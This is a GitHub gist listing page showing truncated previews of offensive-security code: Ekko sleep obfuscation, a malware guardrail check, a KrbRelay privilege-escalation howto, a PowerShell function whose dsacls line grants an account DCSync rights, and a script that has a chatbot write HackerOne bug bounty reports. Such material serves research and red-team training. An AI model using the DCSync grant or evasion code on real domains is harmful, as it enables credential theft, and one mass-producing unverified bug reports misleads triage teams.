-
- #iot
- #chrome-and-friends: Chrome, V8, Blink, Mojo, etc.
- Linux kernel #todo
- expdev #todo
- fuzzing #todo
eversinc33
/ get_dll_from_symbol_server.cpp
Last active
March 2, 2025 06:30
https://x.com/eversinc33/status/1888577040594411956
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <iostream> | |
| #include <sstream> | |
| std::string | |
| GetSymbolServerURL( | |
| const std::string& moduleName | |
| ) | |
| { | |
| /* Extract timestamp and image size from a module |
tin-z
/ VR_roadmap.md
Last active
October 26, 2025 06:26
Becoming a Vulnerability Researcher roadmap: my personal experience
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdbool.h> | |
| #include <windows.h> | |
| #include "nt_crap.h" | |
| #define ArrayCount(arr) (sizeof(arr)/sizeof(arr[0])) | |
| #define assert(expr) if(!(expr)) { *(char*)0 = 0; } |
WKL-Sec
/ FolderPathVerificationSample.cpp
Created
February 5, 2024 15:33
Folder Path Verification C++ Sample: A concise C++ example demonstrating how to verify an application's execution path against a specified directory.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # White Knight Labs - Offensive Development Course | |
| # Guardrails - Folder Check | |
| #include <windows.h> // Include Windows-specific headers for system calls | |
| #include <iostream> // Include for input and output stream operations | |
| #include <string> // Include for using string class | |
| #include <algorithm> // Include for standard algorithms, e.g., std::transform | |
| #include <cctype> // Include for character handling functions, e.g., std::tolower | |
| // Function to check if the path of the current executable is under a specified path |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import poe, sys | |
| client = poe.Client("<POE_API_KEY_HERE>") | |
| title=sys.argv[1] | |
| path=sys.argv[2] | |
| more="" | |
| if len(sys.argv) > 3: | |
| more="\" and here is more information: "+sys.argv[3] | |
| message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+""" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Core.h> | |
| #include <Win32.h> | |
| #include <Structs.h> | |
| #include <Sleep.h> | |
| #include <Utils.h> | |
| SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance) | |
| { |
tothi
/ krbrelay_privesc_howto.md
Last active
April 23, 2025 01:59
Privilege Escalation using KrbRelay and RBCD
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-SyncMeUp{ | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory=$True)] | |
| [string]$AccountName | |
| ) | |
| $dse = [ADSI]"LDAP://Rootdse" | |
| $namingcontext = $dse.defaultNamingContext | |
| echo "Giving $AccountName DCSync rights" | |
| dsacls.exe $namingcontext /G $AccountName":CA;Replicating Directory Changes All" $AccountName":CA;Replicating Directory Changes" |
veil-ivy
/ block_create_process.cpp
Created
February 22, 2022 22:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <ntddk.h> | |
| #define BLOCK_PROCESS "notepad.exe" | |
| static OB_CALLBACK_REGISTRATION obcallback_registration; | |
| static OB_OPERATION_REGISTRATION oboperation_callback; | |
| #define PROCESS_CREATE_THREAD (0x0002) | |
| #define PROCESS_CREATE_PROCESS (0x0080) | |
| #define PROCESS_TERMINATE (0x0001) | |
| #define PROCESS_VM_WRITE (0x0020) | |
| #define PROCESS_VM_READ (0x0010) | |
| #define PROCESS_VM_OPERATION (0x0008) |
NewerOlder